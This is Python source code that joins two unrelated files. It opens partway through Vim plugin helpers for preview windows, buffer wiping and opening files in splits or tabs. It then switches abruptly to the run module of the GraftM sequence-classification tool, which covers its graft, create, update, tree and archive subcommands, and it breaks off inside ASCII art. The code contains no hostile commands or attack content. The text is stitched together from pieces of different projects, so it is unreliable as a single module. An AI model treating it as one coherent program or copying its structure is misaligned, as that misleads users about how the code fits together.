    vim.current.buffer[:] = message.splitlines()

    vim.current.buffer.options[ 'buftype' ]    = 'nofile'
    vim.current.buffer.options[ 'bufhidden' ]  = 'wipe'
    vim.current.buffer.options[ 'buflisted' ]  = False
    vim.current.buffer.options[ 'swapfile' ]   = False
    vim.current.buffer.options[ 'modifiable' ] = False
    vim.current.buffer.options[ 'readonly' ]   = True

    # We need to prevent closing the window causing a warning about unsaved
    # file, so we pretend to Vim that the buffer has not been changed.
    vim.current.buffer.options[ 'modified' ]   = False

    JumpToPreviousWindow()
  else:
    # We couldn't get to the preview window, but we still want to give the user
    # the information we have. The only remaining option is to echo to the
    # status area.
    PostVimMessage( message, warning = False )


def BufferIsVisibleForFilename( filename ):
  """Check if a buffer exists for a specific file."""
  buffer_number = GetBufferNumberForFilename( filename, False )
  return BufferIsVisible( buffer_number )


def CloseBuffersForFilename( filename ):
  """Close all buffers for a specific file."""
  buffer_number = GetBufferNumberForFilename( filename, False )
  while buffer_number != -1:
    vim.command( 'silent! bwipeout! {0}'.format( buffer_number ) )
    new_buffer_number = GetBufferNumberForFilename( filename, False )
    if buffer_number == new_buffer_number:
      raise RuntimeError( "Buffer {0} for filename '{1}' should already be "
                          "wiped out.".format( buffer_number, filename ) )
    buffer_number = new_buffer_number


def OpenFilename( filename, options = {} ):
  """Open a file in Vim. Following options are available:
  - command: specify which Vim command is used to open the file. Choices
  are same-buffer, horizontal-split, vertical-split, and new-tab (default:
  horizontal-split);
  - size: set the height of the window for a horizontal split or the width for
  a vertical one (default: '');
  - fix: set the winfixheight option for a horizontal split or winfixwidth for
  a vertical one (default: False). See :h winfix for details;
  - focus: focus the opened file (default: False);
  - watch: automatically watch for changes (default: False). This is useful
  for logs;
  - position: set the position where the file is opened (default: start).
  Choices are start and end."""

  # Set the options.
  command = GetVimCommand( options.get( 'command', 'horizontal-split' ),
                           'horizontal-split' )
  size = ( options.get( 'size', '' ) if command in [ 'split', 'vsplit' ] else
           '' )
  focus = options.get( 'focus', False )

  # There is no command in Vim to return to the previous tab so we need to
  # remember the current tab if needed.
  if not focus and command == 'tabedit':
    previous_tab = GetIntValue( 'tabpagenr()' )
  else:
    previous_tab = None

  # Open the file.
  try:
    vim.command( '{0}{1} {2}'.format( size, command, filename ) )
  # When the file we are trying to jump to has a swap file,
  # Vim opens swap-exists-choices dialog and throws vim.error with E325 error,
  # or KeyboardInterrupt after user selects one of the options which actually
  # opens the file (Open read-only/Edit anyway).
  except vim.error as e:
    if 'E325' not in str( e ):
      raise

    # Otherwise, the user might have chosen Quit. This is detectable by the
    # current file not being the target file
    if filename != GetCurrentBufferFilepath():
      return
  except KeyboardInterrupt:
    # Raised when the user selects "Abort" after swap-exists-choices
    return

  _SetUpLoadedBuffer( command,
                      filename,
                      options.get( 'fix', False ),
                      options.get( 'position', 'start' ),
                      options.get( 'watch', False ) )

  # Vim automatically set the focus to the opened file so we need to get the
  # focus back (if the focus option is disabled) when opening a new tab or
  # window.
  if not focus:
    if command == 'tabedit':
      JumpToTab( previous_tab )
    if command in [ 'split', 'vsplit' ]:
      JumpToPreviousWindow()


def _SetUpLoadedBuffer( command, filename, fix, position, watch ):
  """After opening a buffer, configure it according to the supplied options,
  which are as defined by the OpenFilename method."""

  if command == 'split':
    vim.current.window.options[ 'winfixheight' ] = fix
  if command == 'vsplit':
    vim.current.window.options[ 'winfixwidth' ] = fix

  if watch:
    vim.current.buffer.options[ 'autoread' ] = True
    vim.command( "exec 'au BufEnter <buffer> :silent! checktime {0}'"
                 .format( filename ) )

  if position == 'end':
    vim.command( 'silent! normal! Gzz' )

#!/usr/bin/env python3

import os
import logging
import tempfile
import shutil

from graftm.sequence_search_results import SequenceSearchResult
from graftm.graftm_output_paths import GraftMFiles
from graftm.search_table import SearchTableWriter
from graftm.sequence_searcher import SequenceSearcher
from graftm.hmmsearcher import NoInputSequencesException
from graftm.housekeeping import HouseKeeping
from graftm.summarise import Stats_And_Summary
from graftm.pplacer import Pplacer
from graftm.create import Create
from graftm.update import Update
from graftm.unpack_sequences import UnpackRawReads
from graftm.graftm_package import GraftMPackage
from graftm.expand_searcher import ExpandSearcher
from graftm.diamond import Diamond
from graftm.getaxnseq import Getaxnseq
from graftm.sequence_io import SequenceIO
from graftm.timeit import Timer
from graftm.clusterer import Clusterer
from graftm.decorator import Decorator
from graftm.external_program_suite import ExternalProgramSuite
from graftm.archive import Archive
from graftm.decoy_filter import DecoyFilter
from biom.util import biom_open

T=Timer()

class UnrecognisedSuffixError(Exception):
    pass

class Run:

    PIPELINE_AA             = "P"
    PIPELINE_NT             = "D"

    _MIN_VERBOSITY_FOR_ART = 3 # with 2 then, only errors are printed

    PPLACER_TAXONOMIC_ASSIGNMENT = 'pplacer'
    DIAMOND_TAXONOMIC_ASSIGNMENT = 'diamond'

    MIN_ALIGNED_FILTER_FOR_NUCLEOTIDE_PACKAGES = 95
    MIN_ALIGNED_FILTER_FOR_AMINO_ACID_PACKAGES = 30

    DEFAULT_MAX_SAMPLES_FOR_KRONA = 100

    NO_ORFS_EXITSTATUS = 128

    def __init__(self, args):
        self.args = args
        self.setattributes(self.args)

    def setattributes(self, args):

        self.hk = HouseKeeping()
        self.s = Stats_And_Summary()
        if args.subparser_name == 'graft':
            commands = ExternalProgramSuite(['orfm', 'nhmmer', 'hmmsearch',
                                             'mfqe', 'pplacer',
                                             'ktImportText', 'diamond'])
            self.hk.set_attributes(self.args)
            self.hk.set_euk_hmm(self.args)
            if args.euk_check:self.args.search_hmm_files.append(self.args.euk_hmm_file)

            self.ss = SequenceSearcher(self.args.search_hmm_files,
                           (None if self.args.search_only else self.args.aln_hmm_file))
            self.sequence_pair_list = self.hk.parameter_checks(args)
            if hasattr(args, 'reference_package'):
                self.p = Pplacer(self.args.reference_package)


        elif self.args.subparser_name == "create":
            commands = ExternalProgramSuite(['taxit', 'FastTreeMP',
                                             'hmmalign', 'mafft'])
            self.create = Create(commands)




    def summarise(self, base_list, trusted_placements, reverse_pipe, times,
                  hit_read_count_list, max_samples_for_krona):
        '''
        summarise - write summary information to file, including otu table, biom
                    file, krona plot, and timing information

        Parameters
        ----------
        base_list : array
            list of each of the files processed by graftm, with the path and
            and suffixed removed
        trusted_placements : dict
            dictionary of placements with entry as the key, a taxonomy string
            as the value
        reverse_pipe : bool
            True = run reverse pipe, False = run normal pipeline
        times : array
            list of the recorded times for each step in the pipeline in the
            format: [search_step_time, alignment_step_time, placement_step_time]
        hit_read_count_list : array
            list containing sublists, one for each file run through the GraftM
            pipeline, each two entries, the first being the number of putative
            eukaryotic reads (when searching 16S), the second being the number
            of hits aligned and placed in the tree.
        max_samples_for_krona: int
            If the number of files processed is greater than this number, then
            do not generate a krona diagram.
        Returns
        -------
        '''

        # Summary steps.
        placements_list = []
        for base in base_list:
            # First assign the hash that contains all of the trusted placements
            # to a variable to it can be passed to otu_builder, to be written
            # to a file. :)
            placements = trusted_placements[base]
            self.s.readTax(placements, GraftMFiles(base, self.args.output_directory, False).read_tax_output_path(base))
            placements_list.append(placements)

        #Generate coverage table
        #logging.info('Building coverage table for %s' % base)
        #self.s.coverage_of_hmm(self.args.aln_hmm_file,
        #                         self.gmf.summary_table_output_path(base),
        #                         self.gmf.coverage_table_path(base),
        #                         summary_dict[base]['read_length'])

        logging.info('Writing summary table')
        with open(self.gmf.combined_summary_table_output_path(), 'w') as f:
            self.s.write_tabular_otu_table(base_list, placements_list, f)

        logging.info('Writing biom file')
        with biom_open(self.gmf.combined_biom_output_path(), 'w') as f:
            biom_successful = self.s.write_biom(base_list, placements_list, f)
        if not biom_successful:
            os.remove(self.gmf.combined_biom_output_path())

        logging.info('Building summary krona plot')
        if len(base_list) > max_samples_for_krona:
            logging.warn("Skipping creation of Krona diagram since there are too many input files. The maximum can be overridden using --max_samples_for_krona")
        else:
            self.s.write_krona_plot(base_list, placements_list, self.gmf.krona_output_path())

        # Basic statistics
        placed_reads=[len(trusted_placements[base]) for base in base_list]
        self.s.build_basic_statistics(times, hit_read_count_list, placed_reads, \
                                      base_list, self.gmf.basic_stats_path())

        # Delete unnecessary files
        logging.info('Cleaning up')
        for base in base_list:
            directions = ['forward', 'reverse']
            if reverse_pipe:
                for i in range(0,2):
                    self.gmf = GraftMFiles(base, self.args.output_directory, directions[i])
                    self.hk.delete([self.gmf.for_aln_path(base),
                                    self.gmf.rev_aln_path(base),
                                    self.gmf.conv_output_rev_path(base),
                                    self.gmf.conv_output_for_path(base),
                                    self.gmf.euk_free_path(base),
                                    self.gmf.euk_contam_path(base),
                                    self.gmf.readnames_output_path(base),
                                    self.gmf.sto_output_path(base),
                                    self.gmf.orf_titles_output_path(base),
                                    self.gmf.orf_output_path(base),
                                    self.gmf.output_for_path(base),
                                    self.gmf.output_rev_path(base)])
            else:
                self.gmf = GraftMFiles(base, self.args.output_directory, False)
                self.hk.delete([self.gmf.for_aln_path(base),
                                self.gmf.rev_aln_path(base),
                                self.gmf.conv_output_rev_path(base),
                                self.gmf.conv_output_for_path(base),
                                self.gmf.euk_free_path(base),
                                self.gmf.euk_contam_path(base),
                                self.gmf.readnames_output_path(base),
                                self.gmf.sto_output_path(base),
                                self.gmf.orf_titles_output_path(base),
                                self.gmf.orf_output_path(base),
                                self.gmf.output_for_path(base),
                                self.gmf.output_rev_path(base)])

        logging.info('Done, thanks for using graftM!\n')

    def graft(self):
        # The Graft pipeline:
        # Searches for reads using hmmer, and places them in phylogenetic
        # trees to derive a community structure.
        if self.args.graftm_package:
            gpkg = GraftMPackage.acquire(self.args.graftm_package)
        else:
            gpkg = None

        REVERSE_PIPE        = (True if self.args.reverse else False)
        INTERLEAVED         = (True if self.args.interleaved else False)
        base_list           = []
        seqs_list           = []
        search_results      = []
        hit_read_count_list = []
        db_search_results   = []


        if gpkg:
            maximum_range = gpkg.maximum_range()

            if self.args.search_diamond_file:
                self.args.search_method = self.hk.DIAMOND_SEARCH_METHOD
                diamond_db = self.args.search_diamond_file[0]
            else:
                diamond_db = gpkg.diamond_database_path()
                if self.args.search_method == self.hk.DIAMOND_SEARCH_METHOD:
                    if not diamond_db:
                        logging.error("%s search method selected, but no diamond database specified. \
                        Please either provide a gpkg to the --graftm_package flag, or a diamond \
                        database to the --search_diamond_file flag." % self.args.search_method)
                        raise Exception()
        else:
            # Get the maximum range, if none exists, make one from the HMM profile
            if self.args.maximum_range:
                maximum_range = self.args.maximum_range
            else:
                if self.args.search_method==self.hk.HMMSEARCH_SEARCH_METHOD:
                    if not self.args.search_only:
                        maximum_range = self.hk.get_maximum_range(self.args.aln_hmm_file)
                    else:
                        logging.debug("Running search only pipeline. maximum_range not configured.")
                        maximum_range = None
                else:
                    logging.warning('Cannot determine maximum range when using %s pipeline and with no GraftM package specified' % self.args.search_method)
                    logging.warning('Setting maximum_range to None (linked hits will not be detected)')
                    maximum_range = None
            if self.args.search_diamond_file:
                diamond_db = self.args.search_diamond_file
            else:
                if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
                    diamond_db = None
                else:
                    logging.error("%s search method selected, but no gpkg or diamond database selected" % self.args.search_method)

        if self.args.assignment_method == Run.DIAMOND_TAXONOMIC_ASSIGNMENT:
            if self.args.reverse:
                logging.warn("--reverse reads specified with --assignment_method diamond. Reverse reads will be ignored.")
                self.args.reverse = None


        # If merge reads is specified, check that there are reverse reads to merge with
        if self.args.merge_reads and not hasattr(self.args, 'reverse'):
            raise Exception("Programming error")

        # Set the output directory if not specified and create that directory
        logging.debug('Creating working directory: %s' % self.args.output_directory)
        self.hk.make_working_directory(self.args.output_directory,
                                       self.args.force)

        # Set pipeline and evalue by checking HMM format
        if self.args.search_only:
            if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
                hmm_type, hmm_tc = self.hk.setpipe(self.args.search_hmm_files[0])
                logging.debug("HMM type: %s Trusted Cutoff: %s" % (hmm_type, hmm_tc))
        else:
            hmm_type, hmm_tc = self.hk.setpipe(self.args.aln_hmm_file)
            logging.debug("HMM type: %s Trusted Cutoff: %s" % (hmm_type, hmm_tc))

        if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
            setattr(self.args, 'type', hmm_type)
            if hmm_tc:
                setattr(self.args, 'evalue', '--cut_tc')
        else:
            setattr(self.args, 'type', self.PIPELINE_AA)

        if self.args.filter_minimum is not None:
            filter_minimum = self.args.filter_minimum
        else:
            if self.args.type == self.PIPELINE_NT:
                filter_minimum = Run.MIN_ALIGNED_FILTER_FOR_NUCLEOTIDE_PACKAGES
            else:
                filter_minimum = Run.MIN_ALIGNED_FILTER_FOR_AMINO_ACID_PACKAGES

        # Generate expand_search database if required
        if self.args.expand_search_contigs:
            if self.args.graftm_package:
                pkg = GraftMPackage.acquire(self.args.graftm_package)
            else:
                pkg = None
            boots = ExpandSearcher(
                search_hmm_files = self.args.search_hmm_files,
                maximum_range = self.args.maximum_range,
                threads = self.args.threads,
                evalue = self.args.evalue,
                min_orf_length = self.args.min_orf_length,
                graftm_package = pkg)

            # this is a hack, it should really use GraftMFiles but that class isn't currently flexible enough
            new_database = (os.path.join(self.args.output_directory, "expand_search.hmm") \
                            if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD \
                            else os.path.join(self.args.output_directory, "expand_search")
                            )

            if boots.generate_expand_search_database_from_contigs(
                                     self.args.expand_search_contigs,
                                     new_database,
                                     self.args.search_method):
                if self.args.search_method == self.hk.HMMSEARCH_SEARCH_METHOD:
                    self.ss.search_hmm.append(new_database)
                else:
                    diamond_db = new_database

        first_search_method = self.args.search_method
        if self.args.decoy_database:
            decoy_filter = DecoyFilter(Diamond(diamond_db, threads=self.args.threads),
                                       Diamond(self.args.decoy_database,
                                               threads=self.args.threads))
            doing_decoy_search = True
        elif self.args.search_method == self.hk.HMMSEARCH_AND_DIAMOND_SEARCH_METHOD:
            decoy_filter = DecoyFilter(Diamond(diamond_db, threads=self.args.threads))
            doing_decoy_search = True
            first_search_method = self.hk.HMMSEARCH_SEARCH_METHOD
        else:
            doing_decoy_search = False

        # For each pair (or single file passed to GraftM)
        logging.debug('Working with %i file(s)' % len(self.sequence_pair_list))
        for pair in self.sequence_pair_list:
            # Guess the sequence file type, if not already specified to GraftM
            unpack = UnpackRawReads(pair[0],
                                    self.args.input_sequence_type,
                                    INTERLEAVED)

            # Set the basename, and make an entry to the summary table.
            base = unpack.basename()
            pair_direction = ['forward', 'reverse']
            logging.info("Working on %s" % base)

            # Make the working base subdirectory
            self.hk.make_working_directory(os.path.join(self.args.output_directory,
                                                        base),
                                           self.args.force)

            # for each of the paired end read files
            for read_file in pair:
                unpack = UnpackRawReads(read_file,
                                        self.args.input_sequence_type,
                                        INTERLEAVED)
                if read_file is None:
                    # placeholder for interleaved (second file is None)
                    continue

                if not os.path.isfile(read_file): # Check file exists
                    logging.info('%s does not exist! Skipping this file..' % read_file)
                    continue

                # Set the output file_name
                if len(pair) == 2:
                    direction = 'interleaved' if pair[1] is None \
                                              else pair_direction.pop(0)
                    logging.info("Working on %s reads" % direction)
                    self.gmf = GraftMFiles(base,
                                           self.args.output_directory,
                                           direction)
                    self.hk.make_working_directory(os.path.join(self.args.output_directory,
                                                                base,
                                                                direction),
                                                   self.args.force)
                else:
                    direction = False
                    self.gmf = GraftMFiles(base,
                                           self.args.output_directory,
                                           direction)

                if self.args.type == self.PIPELINE_AA:
                    logging.debug("Running protein pipeline")
                    try:
                        search_time, (result, complement_information) = self.ss.aa_db_search(
                            self.gmf,
                            base,
                            unpack,
                            first_search_method,
                            maximum_range,
                            self.args.threads,
                            self.args.evalue,
                            self.args.min_orf_length,
                            self.args.restrict_read_length,
                            diamond_db
                        )
                    except NoInputSequencesException as e:
                        logging.error("No sufficiently long open reading frames were found, indicating"
                                      " either the input sequences are too short or the min orf length"
                                      " cutoff is too high. Cannot continue sorry. Alternatively, there"
                                      " is something amiss with the installation of OrfM. The specific"
                                      " command that failed was: %s" % e.command)
                        exit(Run.NO_ORFS_EXITSTATUS)

                # Or the DNA pipeline
                elif self.args.type == self.PIPELINE_NT:
                    logging.debug("Running nucleotide pipeline")
                    search_time, (result, complement_information)  = self.ss.nt_db_search(
                        self.gmf,
                        base,
                        unpack,
                        self.args.euk_check,
                        self.args.search_method,
                        maximum_range,
                        self.args.threads,
                        self.args.evalue
                    )

                reads_detected = True
                if not result.hit_fasta() or os.path.getsize(result.hit_fasta()) == 0:
                    logging.info('No reads found in %s' % base)
                    reads_detected = False



                if self.args.search_only:
                    db_search_results.append(result)
                    base_list.append(base)
                    continue

                # Filter out decoys if specified
                if reads_detected and doing_decoy_search:
                    with tempfile.NamedTemporaryFile(prefix="graftm_decoy", suffix='.fa') as f:
                        tmpname = f.name
                    any_remaining = decoy_filter.filter(result.hit_fasta(),
                                                        tmpname)
                    if any_remaining:
                        shutil.move(tmpname, result.hit_fasta())
                    else:
                        # No hits remain after decoy filtering.
                        os.remove(result.hit_fasta())
                        continue

                if self.args.assignment_method == Run.PPLACER_TAXONOMIC_ASSIGNMENT:
                    logging.info('aligning reads to reference package database')
                    hit_aligned_reads = self.gmf.aligned_fasta_output_path(base)

                    if reads_detected:
                        aln_time, aln_result = self.ss.align(
                                                            result.hit_fasta(),
                                                            hit_aligned_reads,
                                                            complement_information,
                                                            self.args.type,
                                                            filter_minimum
                                                            )
                    else:
                        aln_time = 'n/a'
                    if not os.path.exists(hit_aligned_reads): # If all were filtered out, or there just was none..
                        with open(hit_aligned_reads,'w') as f:
                            pass # just touch the file, nothing else
                    seqs_list.append(hit_aligned_reads)

                db_search_results.append(result)
                base_list.append(base)
                search_results.append(result.search_result)
                hit_read_count_list.append(result.hit_count)

        # Write summary table
        srchtw = SearchTableWriter()
        srchtw.build_search_otu_table([x.search_objects for x in db_search_results],
                                      base_list,
                                      self.gmf.search_otu_table())

        if self.args.search_only:
            logging.info('Stopping before alignment and taxonomic assignment phase\n')
            exit(0)


        if self.args.merge_reads: # not run when diamond is the assignment mode- enforced by argparse grokking
            logging.debug("Running merge reads output")
            if self.args.interleaved:
                fwd_seqs = seqs_list
                rev_seqs = []
            else:
                base_list=base_list[0::2]
                fwd_seqs = seqs_list[0::2]
                rev_seqs = seqs_list[1::2]
            merged_output=[GraftMFiles(base, self.args.output_directory, False).aligned_fasta_output_path(base) \
                           for base in base_list]
            logging.debug("merged reads to %s", merged_output)
            self.ss.merge_forev_aln(fwd_seqs, rev_seqs, merged_output)
            seqs_list=merged_output
            REVERSE_PIPE = False

        elif REVERSE_PIPE:
            base_list=base_list[0::2]

        # Leave the pipeline if search only was specified
        if self.args.search_and_align_only:
            logging.info('Stopping before taxonomic assignment phase\n')
            exit(0)
        elif not any(base_list):
            logging.error('No hits in any of the provided files. Cannot continue with no reads to assign taxonomy to.\n')
            exit(0)
        self.gmf = GraftMFiles('',
                               self.args.output_directory,
                               False)

        if self.args.assignment_method == Run.PPLACER_TAXONOMIC_ASSIGNMENT:
            clusterer=Clusterer()
            # Classification steps
            seqs_list=clusterer.cluster(seqs_list, REVERSE_PIPE)
            logging.info("Placing reads into phylogenetic tree")
            taxonomic_assignment_time, assignments=self.p.place(REVERSE_PIPE,
                                                                seqs_list,
                                                                self.args.resolve_placements,
                                                                self.gmf,
                                                                self.args,
                                                                result.slash_endings,
                                                                gpkg.taxtastic_taxonomy_path(),
                                                                clusterer)
            assignments = clusterer.uncluster_annotations(assignments, REVERSE_PIPE)

        elif self.args.assignment_method == Run.DIAMOND_TAXONOMIC_ASSIGNMENT:
            logging.info("Assigning taxonomy with diamond")
            taxonomic_assignment_time, assignments = self._assign_taxonomy_with_diamond(\
                        base_list,
                        db_search_results,
                        gpkg,
                        self.gmf)
            aln_time = 'n/a'
        else: raise Exception("Unexpected assignment method encountered: %s" % self.args.placement_method)
        
        self.summarise(base_list, assignments, REVERSE_PIPE,
                       [search_time, aln_time, taxonomic_assignment_time],
                       hit_read_count_list, self.args.max_samples_for_krona)

    @T.timeit
    def _assign_taxonomy_with_diamond(self, base_list, db_search_results,
                                      graftm_package, graftm_files):
        '''Run diamond to assign taxonomy

        Parameters
        ----------
        base_list: list of str
            list of sequence block names
        db_search_results: list of DBSearchResult
            the result of running hmmsearches
        graftm_package: GraftMPackage object
            Diamond is run against this database
        graftm_files: GraftMFiles object
            Result files are written here

        Returns
        -------
        list of
        1. time taken for assignment
        2. assignments i.e. dict of base_list entry to dict of read names to
            to taxonomies, or None if there was no hit detected.
        '''
        runner = Diamond(graftm_package.diamond_database_path(),
                         self.args.threads,
                         self.args.evalue)
        taxonomy_definition = Getaxnseq().read_taxtastic_taxonomy_and_seqinfo\
                (open(graftm_package.taxtastic_taxonomy_path()),
                 open(graftm_package.taxtastic_seqinfo_path()))
        results = {}

        # For each of the search results,
        for i, search_result in enumerate(db_search_results):
            if search_result.hit_fasta() is None:
                sequence_id_to_taxonomy = {}
            else:
                sequence_id_to_hit = {}
                # Run diamond
                logging.debug("Running diamond on %s" % search_result.hit_fasta())
                diamond_result = runner.run(search_result.hit_fasta(),
                                            UnpackRawReads.PROTEIN_SEQUENCE_TYPE,
                                            daa_file_basename=graftm_files.diamond_assignment_output_basename(base_list[i]))
                for res in diamond_result.each([SequenceSearchResult.QUERY_ID_FIELD,
                                                SequenceSearchResult.HIT_ID_FIELD]):
                    if res[0] in sequence_id_to_hit:
                        # do not accept duplicates
                        if sequence_id_to_hit[res[0]] != res[1]:
                            raise Exception("Diamond unexpectedly gave two hits for a single query sequence for %s" % res[0])
                    else:
                        sequence_id_to_hit[res[0]] = res[1]

                # Extract taxonomy of the best hit, and add in the no hits
                sequence_id_to_taxonomy = {}
                for seqio in SequenceIO().read_fasta_file(search_result.hit_fasta()):
                    name = seqio.name
                    if name in sequence_id_to_hit:
                        # Add Root; to be in line with pplacer assignment method
                        sequence_id_to_taxonomy[name] = ['Root']+taxonomy_definition[sequence_id_to_hit[name]]
                    else:
                        # picked up in the initial search (by hmmsearch, say), but diamond misses it
                        sequence_id_to_taxonomy[name] = ['Root']

            results[base_list[i]] = sequence_id_to_taxonomy
        return results

    def main(self):

        if self.args.subparser_name == 'graft':
            if self.args.verbosity >= self._MIN_VERBOSITY_FOR_ART: print('''
                                GRAFT

                       Joel Boyd, Ben Woodcroft

                                                         __/__
                                                  ______|
          _- - _                         ________|      |_____/
           - -            -             |        |____/_
           - _     >>>>  -   >>>>   ____|
          - _-  -         -             |      ______
             - _                        |_____|
           -                                  |______
            ''')
            self.graft()

        elif self.args.subparser_name == 'create':
            if self.args.verbosity >= self._MIN_VERBOSITY_FOR_ART: print('''
                            CREATE

                   Joel Boyd, Ben Woodcroft

                                                    /
              >a                                   /
              -------------                       /
              >b                        |        |
              --------          >>>     |  GPKG  |
              >c                        |________|
              ----------
''')
            if self.args.dereplication_level < 0:
                logging.error("Invalid dereplication level selected! please enter a positive integer")
                exit(1)

            else:
                if not self.args.sequences:
                    if not self.args.alignment and not self.args.rerooted_annotated_tree \
                                               and not self.args.rerooted_tree:
                        logging.error("Some sort of sequence data must be provided to run graftM create")
                        exit(1)
                if self.args.taxonomy:
                    if self.args.rerooted_annotated_tree:
                        logging.error("--taxonomy is incompatible with --rerooted_annotated_tree")
                        exit(1)
                    if self.args.taxtastic_taxonomy or self.args.taxtastic_seqinfo:
                        logging.error("--taxtastic_taxonomy and --taxtastic_seqinfo are incompatible with --taxonomy")
                        exit(1)
                elif self.args.rerooted_annotated_tree:
                    if self.args.taxtastic_taxonomy or self.args.taxtastic_seqinfo:
                        logging.error("--taxtastic_taxonomy and --taxtastic_seqinfo are incompatible with --rerooted_annotated_tree")
                        exit(1)
                else:
                    if not self.args.taxtastic_taxonomy or not self.args.taxtastic_seqinfo:
                        logging.error("--taxonomy, --rerooted_annotated_tree or --taxtastic_taxonomy/--taxtastic_seqinfo is required")
                        exit(1)
                if bool(self.args.taxtastic_taxonomy) ^  bool(self.args.taxtastic_seqinfo):
                    logging.error("Both or neither of --taxtastic_taxonomy and --taxtastic_seqinfo must be defined")
                    exit(1)
                if self.args.alignment and self.args.hmm:
                    logging.warn("Using both --alignment and --hmm is rarely useful, but proceding on the assumption you understand.")
                if len([_f for _f in [self.args.rerooted_tree,
                                     self.args.rerooted_annotated_tree,
                                     self.args.tree] if _f]) > 1:
                    logging.error("Only 1 input tree can be specified")
                    exit(1)

                self.create.main(
                              dereplication_level = self.args.dereplication_level,
                              sequences = self.args.sequences,
                              alignment = self.args.alignment,
                              taxonomy = self.args.taxonomy,
                              rerooted_tree = self.args.rerooted_tree,
                              unrooted_tree = self.args.tree,
                              tree_log = self.args.tree_log,
                              prefix = self.args.output,
                              rerooted_annotated_tree = self.args.rerooted_annotated_tree,
                              min_aligned_percent = float(self.args.min_aligned_percent)/100,
                              taxtastic_taxonomy = self.args.taxtastic_taxonomy,
                              taxtastic_seqinfo = self.args.taxtastic_seqinfo,
                              hmm = self.args.hmm,
                              search_hmm_files = self.args.search_hmm_files,
                              force = self.args.force,
                              threads = self.args.threads
                              )

        elif self.args.subparser_name == 'update':
            logging.info("GraftM package %s specified to update with sequences in %s" % (self.args.graftm_package, self.args.sequences))
            if self.args.regenerate_diamond_db:
                gpkg = GraftMPackage.acquire(self.args.graftm_package)
                logging.info("Regenerating diamond DB..")
                gpkg.create_diamond_db()
                logging.info("Diamond database regenerated.")
                return
            elif not self.args.sequences:
                logging.error("--sequences is required unless regenerating the diamond DB")
                exit(1)

            if not self.args.output:
                if self.args.graftm_package.endswith(".gpkg"):
                    self.args.output = self.args.graftm_package.replace(".gpkg", "-updated.gpkg")
                else:
                    self.args.output = self.args.graftm_package + '-update.gpkg'

            Update(ExternalProgramSuite(
                ['taxit', 'FastTreeMP', 'hmmalign', 'mafft'])).update(
                    input_sequence_path=self.args.sequences,
                    input_taxonomy_path=self.args.taxonomy,
                    input_graftm_package_path=self.args.graftm_package,
                    output_graftm_package_path=self.args.output)

        elif self.args.subparser_name == 'expand_search':
            args = self.args
            if not args.graftm_package and not args.search_hmm_files:
                logging.error("expand_search mode requires either --graftm_package or --search_hmm_files")
                exit(1)

            if args.graftm_package:
                pkg = GraftMPackage.acquire(args.graftm_package)
            else:
                pkg = None

            expandsearcher = ExpandSearcher(search_hmm_files = args.search_hmm_files,
                maximum_range = args.maximum_range,
                threads = args.threads,
                evalue = args.evalue,
                min_orf_length = args.min_orf_length,
                graftm_package = pkg)
            expandsearcher.generate_expand_search_database_from_contigs(args.contigs,
                                                              args.output_hmm,
                                                              search_method=ExpandSearcher.HMM_SEARCH_METHOD)




        elif self.args.subparser_name == 'tree':
            if self.args.graftm_package:
                # shim in the paths from the graftm package, not overwriting
                # any of the provided paths.
                gpkg = GraftMPackage.acquire(self.args.graftm_package)
                if not self.args.rooted_tree: self.args.rooted_tree = gpkg.reference_package_tree_path()
                if not self.args.input_greengenes_taxonomy:
                    if not self.args.input_taxtastic_seqinfo:
                        self.args.input_taxtastic_seqinfo = gpkg.taxtastic_seqinfo_path()
                    if not self.args.input_taxtastic_taxonomy:
                        self.args.input_taxtastic_taxonomy = gpkg.taxtastic_taxonomy_path()

            if self.args.rooted_tree:
                if self.args.unrooted_tree:
                    logging.error("Both a rooted tree and an un-rooted tree were provided, so it's unclear what you are asking GraftM to do. \
If you're unsure see graftM tree -h")
                    exit(1)
                elif self.args.reference_tree:
                    logging.error("Both a rooted tree and reference tree were provided, so it's unclear what you are asking GraftM to do. \
If you're unsure see graftM tree -h")
                    exit(1)

                if not self.args.decorate:
                    logging.error("It seems a rooted tree has been provided, but --decorate has not been specified so it is unclear what you are asking graftM to do.")
                    exit(1)

                dec = Decorator(tree_path = self.args.rooted_tree)

            elif self.args.unrooted_tree and self.args.reference_tree:
                logging.debug("Using provided reference tree %s to reroot %s" % (self.args.reference_tree,
                                                                                 self.args.unrooted_tree))
                dec = Decorator(reference_tree_path = self.args.reference_tree,
                                tree_path = self.args.unrooted_tree)
            else:
                logging.error("Some tree(s) must be provided, either a rooted tree or both an unrooted tree and a reference tree")
                exit(1)

            if self.args.output_taxonomy is None and self.args.output_tree is None:
                logging.error("Either an output tree or taxonomy must be provided")
                exit(1)
            if self.args.input_greengenes_taxonomy:
                if self.args.input_taxtastic_seqinfo or self.args.input_taxtastic_taxonomy:
                    logging.error("Both taxtastic and greengenes taxonomy were provided, so its unclear what taxonomy you want graftM to decorate with")
                    exit(1)
                logging.debug("Using input GreenGenes style taxonomy file")
                dec.main(self.args.input_greengenes_taxonomy,
                         self.args.output_tree, self.args.output_taxonomy,
                         self.args.no_unique_tax, self.args.decorate, None)
            elif self.args.input_taxtastic_seqinfo and self.args.input_taxtastic_taxonomy:
                logging.debug("Using input taxtastic style taxonomy/seqinfo")
                dec.main(self.args.input_taxtastic_taxonomy, self.args.output_tree,
                         self.args.output_taxonomy, self.args.no_unique_tax,
                         self.args.decorate, self.args.input_taxtastic_seqinfo)
            else:
                logging.error("Either a taxtastic taxonomy or seqinfo file was provided. GraftM cannot continue without both.")
                exit(1)

        elif self.args.subparser_name == 'archive':
            # Back slashes in the ASCII art are escaped.
            if self.args.verbosity >= self._MIN_VERBOSITY_FOR_ART: print("""
                               ARCHIVE

                        Joel Boyd, Ben Woodcroft

                  ____.----.
        ____.----'          \\
        \\                    \\
         \\                    \\
          \\                    \\
           \\          ____.----'`--.__
            \\___.----'          |     `--.____
           /`-._                |       __.-' \\
          /     `-._            ___.---'       \\
         /          `-.____.---'                \\           +------+
        /            / | \\                       \\          |`.    |`.
       /            /  |  \\                   _.--'  <===>  |  `+--+---+
       `-.         /   |   \\            __.--'              |   |  |   |
          `-._    /    |    \\     __.--'     |              |   |  |   |
            | `-./     |     \\_.-'           |              +---+--+   |
            |          |                     |               `. |   `. |
            |          |                     |                 `+------+
            |          |                     |
            |          |                     |
            |          |                     |
            |          |                     |
            |          |                     |
